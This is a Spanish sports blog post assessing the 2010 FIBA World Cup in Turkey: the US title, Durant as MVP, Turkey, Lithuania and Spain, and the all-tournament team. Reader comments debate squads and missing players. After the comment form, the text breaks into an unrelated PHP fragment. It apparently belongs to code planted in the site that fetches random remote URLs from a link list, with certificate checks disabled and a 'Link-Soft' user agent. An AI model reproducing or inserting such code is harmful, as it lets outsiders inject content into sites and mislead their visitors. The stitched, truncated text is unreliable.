Mundobasket 2010: Final

13 de September de 2010 por TheDeerHunter

podiumSe terminó el Mundobasket de Turquía, buen aperitivo para la intensa temporada baloncestítica que nos aguarda.

Queda, sin embargo, una sensación de cierta decepción: al campeonato le ha faltado igualdad, emoción y un punto de calidad. Los EEUU se han paseado. Vuelve la hegemonía que casi ya no recordábamos. Ahora callan los virulentos críticos al modelo NBA y se despejan las dudas acerca de su nivel.

También hay que hablar en este sentido de  la actuación de España, muy por debajo de lo esperado, y de la más que cuestionable elección del quinteto ideal. Luego iremos desgranándolo nombre a nombre.

No ha habido mucha historia en el camino de USA hacia su cuarto cetro mundial. Con una intensa defensa de perímetro, su tradicional juego de contragolpe y el buen hacer de Durant y Billups en estático han destrozado a todos los rivales (excepto a Brasil en la fase preliminar).  Tampoco conviene ignorar el gran esfuerzo de Lamar Odom, habitualmente en condiciones de inferioridad en el puesto de pívot, como tampoco el excelente trabajo de Eric Gordon como francotirador y “abrelatas”. Ya dijimos que podía llegar a ser una de las revelaciones del campeonato cuando era uno de los candidatos al descarte. Difícilmente Rondo lo habría hecho mejor.

kdmvpDesde que comenzó el verdadero campeonato para ellos, Rusia, Lituania y Turquía han sido las víctimas de las mismas constantes. La más decisiva, Durant, ha registrado sucesivamente 33-5; 38-9 y 28-5. Desde la posición de ala-pívot “a lo FIBA” ha sido literalmente imparable y justo MVP del torneo. Lógicamente, nada que objetar a su presencia en el quinteto ideal. Igual sorprende más que no haya ningún otro miembro de este equipo incluido en él.

Hay que reconocerles la seriedad y el respeto con los que han afrontado el reto. También la excelente gestión de Mike Krzyzewski y de todo el equipo técnico. Han demostrado ser los mejores y unos brillantes campeones del mundo.

Después del equipo nacional norteamericano tenemos que rendirnos al gran hacer de Turquía. El dignísimo subcampeonato lo han logrado a base de talento, potencia y buen juego. No han necesitado, como en otras ocasiones, la influencia del temido infierno turco ni extraños efectos turkal grupo arbitral. Sin contar con una pieza clave como Okur, tienen una batería importante de representantes NBA: Turkoglu, Ilyasova, Erden y Asik. Después cuentan con 5 ó 6 hombres más que  válidos, como demostró Tunceri en el clutch que eliminó a Serbia (quien a espada mata…) o los propios Onan y Arslan.

Turkoglu ha estado cada vez mejor conforme ha avanzado el campeonato y contra USA fue el único capaz de dar la cara. Con todo, no parece el mejor “escolta” del torneo como así se desprende del quinteto ideal. De todas formas está claro que por decreto político debía de nombrarse en él al mejor jugador de los subcampeones. Es un criterio que no compartirmos. Parece evidente que, por ejemplo, Navarro ha hecho bastante mejor torneo que el turco.

La medalla de bronce se la llevan los lituanos. Kleiza, por fin, ha sido el líder que debe ser y ha llevado a su país a la primera medalla mundialista de su historia. Parece increíble que no tuvieran ninguna antes. El jugador de los Raptors se despidió ayer con 33 puntos, 7 rebotes, 4 asistencias y 3 robos en otra actuación brutal que ilustra lo que ha sido su campeonato. Miembro de derecho en el quinteto ideal del mismo. A su gran actuación hay que añadir el buen hacer colectivo y la aportación de los Kalnietis, Pocius, Jankunas, Maciulis… Sólo los americanos han podido doblegarlos.

teodosictresPor su parte, los serbios sufrieron su 3ª derrota ante los lituanos y quedan con justicia fuera del podio. Su gran hito fue eliminar a España en un grandioso partido por su parte y gracias al milagro de Teodosic.  Sin embargo, más allá de ese hecho en concreto, no ha sido un campeonato tan brillante por su parte. Habiendo visto las maravillas de Marcelinho Huertas o a Billups no termino de entender la decisión de elegirle como el mejor base. Otra vez cuestión política, me temo.

Por último, el 5º elegido para el mejor quinteto ha sido de forma más que merecida Luis Scola. Su partido frente a Brasil será recordado durante mucho tiempo.

Como anécdota hay que mencionar que el 5º puesto fue para Argentina, que también superó a España, y el 7º para los rusos, que tumbaron a Eslovenia.

Comenta

19 comentarios a esta entrada

  1. Txusma dice:
    #1

    En la final Tunceri y Turkoglu se pasaron sentados creo que todo el tercer cuarto “castigados” por el entrenador. Exactamente alguien se enteró pq fue?
    Y me he quedado con las ganas de ver más a Stephen Curry. En los pocos minutos q ha estado en pista creo que ha hecho cosas más que interesantes. Creo q triunfará en la NBA pero si no lo hiciera se comería el basket FIBA a bocados.

      Citar

  2. MagicJohnson32 dice:
    #2

    La verdad es que si no fuese por Durant y el impresionante Argentina-Brasil de cuartos, este Mundial me habría parecido de lo más mediocre (salvando alguna otra excepción, claro). O, al menos, descafeinado.

    Esperemos que en Londres estén los Nowitzki, Ginobili, Parker, Pau, Kobe y compañía.

    S-Curry es una delicia y no hay duda de que triunfará donde a él le dé la gana.

      Citar

  3. Love Denise dice:
    #3

    El mundial habrá sido descafeinado por las grandes ausencias, pero en realidad, ha habido tremendos partidazos emocionantisimos.
    Ejemplos:; el EEUU – Brasil;
    Argentina – Brasil
    Argentina – Serbia
    Serbia – Croacia
    Serbia – España
    Serbia – Turquía
    Y seguro que me dejo alguno atrás,

      Citar

  4. MagicJohnson32 dice:
    #4

    Emoción sí que ha habido, desde luego, pero yo he echado en falta calidad.

      Citar

  5. NBA dice:
    #5

    Hola Felicitaciones por el blog!

    Estamos trabajando en un portal de noticias NBA enfocado en jugadores españoles y latinos: http://www.pasesycortes.com

    Por favor visítanos y danos tu opinion.

    Saludos!

      Citar

  6. Óscar dice:
    #6

    Demasiadas ausencias, pero aún así creo que ha sido un buen Mundial.
    Yo siempre le doy vueltas a lo que podría hacer Eslovenia si por una vez llevase a todos sus mejores jugadores a un Europeo, Mundial o JJ.OO.
    Un quinteto con Beno Udrih, Vujacic, Nachbar, E.Lorbek y Nesterovic, más un banco con Lakovic, Dragic, Smodis, Slokar y Brezec, con Becirovic y Zupan completando los 12… Sólo hay que repasar los que se quedarían fuera para pensar en el potencial del equipo: Samo Udrih, Klobucar, Jagodnik, el otro Lorbek, Rizvic o Vidmar… casi nada.
    En cuanto a España, está claro que las bajas de Pau y Calderón han sido fundamentales, no hay que estrujarse mucho para creer que son los que marcan la verdadera diferencia en el equipo, las referencias dentro y fuera. Larga vida a la Roja.

      Citar

  7. Love Denise dice:
    #7

    Mas destacadas aún son las bajas de Francia (Parker, Mickael Pietrus, Noah, Turiaf, Beaubois) y por supuesto las de Lituania (Siskauskas, Jasikevicius, Kaukenas, Hermanos Lavrinovic) y aún asi han quedado bronce. Desde mi punto de vista, con todas las plantillas al completo, los mejores equipos serían.
    1- EEUU 2- España 3- Francia 4-Lituania 5-Argentina 6- Serbia 7-Turquía 8-Eslovenia 9-Brasil 10-Rusia.

    Por cierto Oscar, en serio pondrías a Vujacic en el 5 inicial de Eslovenia y a Dragic de suplente????

      Citar

  8. Love Denise dice:
    #8

    y Vidmar me parece mucho mejor jugador que Zupan, Slokar, Brezec y Nesterovic. para mi sería el 3er jugador interior tras Smodis y Lorbek.

      Citar

  9. TheDeerHunter dice:
    #9

    Yo he visto a Francia jugar con todos esos que dices y a lo más que han llegado es a jugar como el culo. Vamos que mucho de menos no les han echado.
    Menuda banda.

    Te falta Alemania… con Nowitzki (y Kaman) estoy seguro que hubieran entrado sobrados en un top 10. Con dudas en un top 5. Sin ninguna duda por delante de Francia.

    Y bueno… creo que Brasil con Nené igual también debería quedar más arriba.

    De quien también tengo muchas dudas es de Serbia. Son los que menos bajas han tenido.

      Citar

  10. Love Denise dice:
    #10

    No creo que Alemania estén en un top 10. Yo tb he visto jugar a Alemania con Dirk y Kaman, y el amigo Kaman se marcó unos JJOO bastante discretito. Aparte de ahí, sólo Greene se salva, los Hamann, Schwelthem (o como se escriba) Jagla y Cia están a años luz de ofrecer un nivel digno, vamos que desentonan bastante.

    Qué manía tiene Deer con los franceses, que por cierto, es imposible que los hayas visto al completo, Noah y Beaubois no han jugado con la seleción, y Mickael Pietrus creo que no va desde 2005.

      Citar

  11. Junior dice:
    #11

    Y que me dicen del trio de dominicana de AL HORFORD, CHARLIE VILLANUEVA Y FRANCISCO GARCIA
    Por cierto primera vez que posteo..

      Citar

  12. TheDeerHunter dice:
    #12

    Admito que no los he visto al completo… de hecho no tenía a Noah como francés.
    Sin embargo su problema es la concepción del juego y el aspecto ofensivo… y por ahí no es por donde Noah (ni Pietrus) les pueden ayudar más.
    Para mí no son top 3, a menos que Beaubois y sobre todo Batum den un paso adelante. De Colo también me parece clave en ese sentido y no precisamente para darle descanso a Parker. Por supuesto todo pasa porque éste último juegue y sepa involucrar a los demás.

    Es cierto que Kaman hizo un campeonato lamentable hace no mucho, pero ese no es su nivel. De todas formas te recuerdo que Alemania no hizo mal papel en el Europeo y con ellos dos más 3 mancos más se pueden hacer cosas.

    Bienvenido, Junior. Los dominicanos también molan bastante… a ver si les podemos ver jugar pronto juntos alguna gran competición. De todas formas por aquí hay gente que tiene muy atravesado a Charlie… por méritos suyos, me temo.

      Citar

  13. L.Casei dice:
    #13

    Y Ariza también es dominicano, aunque nació ya en EE..UU. (creo que se crió en Florida).
    Con un base decente, vaya quinteto titular con Trevor-Francisco-Charlie y el hijo del “Tito” Horford, “Al Star”…

      Citar

  14. Óscar dice:
    #14

    Ese base decente puede ser Edgar Sosa, que jugará en Italia esta temporada tras completar su año senior con la Louisville de Pitino. Buen jugador, físico. Lo intentó con los Pistons en Las Vegas en julio y no jugó mal, pero no le ofrecieron contrato. No descarto que en un año consiga un puesto en alguna franquicia.
    Ya tenemos el quinteto dominicano: Sosa-García-Ariza-Villanueva-Horford. A media de altura y capacidad atlética pocos le podrían igualar… si se juntan.

      Citar

  15. aro_pasado_no_newtoniano dice:
    #15

    A ver..prefiero a un palo de escoba que a Villanueva,,menudo desastre de tio. Sosa-García-Ariza (estos dos molan, tienen algo de cabeza y defienden que se las pelan)-Palo de Escoba-Horford.

    Beaubois aportaría algo diferente. De Colo, que debería ser el cerebro, no ha estado. No sé si alguna vez estará. No me pronuncio respecto a Noah, si sólo aporta físico,, de eso van sobrados. Pietrus (ambos) nada de nada. y ¿qué pasa en Francia? ¿los magrebíes no juegan a esto de la canasta? todos los inmigrantes son noirs,,también los hay musulmanes.

      Citar

  16. kantonyo dice:
    #16

    Pensando en el futuro, creo que Lituania puede reunir dentro de unos años una gran plantilla. A la madurez y liderazgo de Kleiza (’86) acompañado de sus gregarios de generación como Maciulis, Pocius y Kalnietis se les va a unir en los próximos años dos jugadores que en este momento optan a top 10 del próximo draft: El alapívot Donatas Motiejunas (’90) y el jovencisimo pívot del año 92: Jonas Valanciunas.

    Este último MVP del último Europeo sub-18. Barrieron en la mayoria de sus partidos con una una media de 20 puntos de diferencia. En la final Jonas hizo 31 puntos y 18 rebotes contra Rusia.

    Ojo tambien a una gran desconocida del baloncesto: la Republica Checa. Está creando buenos jugadores. Al ya conocido Jan Vesely (’90) del Partizan se le une otra joven perla, el escolta Tomas Satoransky (’91) que juega en la ACB (Cajasol).

      Citar

  17. LEmontus dice:
    #17

    Impotencia ante una seleccion secundaria de EE UU. No hay color entre el basket de USA y el resto del mundo. Solo espero que Pau vaya a las próximas olimpiadas , que Ricky tenga mucho menos protagonismo y entonces optaremos al oro. Me ha gustado el nivel mostrado por Argentina y Brasil, y sobre todo Turquía.

      Citar

  18. Love Denise dice:
    #18

    hombre, Lemontus por aquí jejjje

    Kantonyo, muy bueno también Deividas Pukis, tirador de 3 puntos brutal, otra perla lituana del año 92.

    Creo que la República Checa está todavía lejos de explotar su materia prima baloncestistica pero…que Dios Bendiga la Republica Checa!!!!

      Citar

  19. Junior dice:
    #19

    Soy dominicano y de verdad que sue;o con ver a mi pais en grandes competicones… a ver si logramos juntar a ese quinteto y dar la pelea… Los felicito por el blog, de verdad que ustedes saben de este juego..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>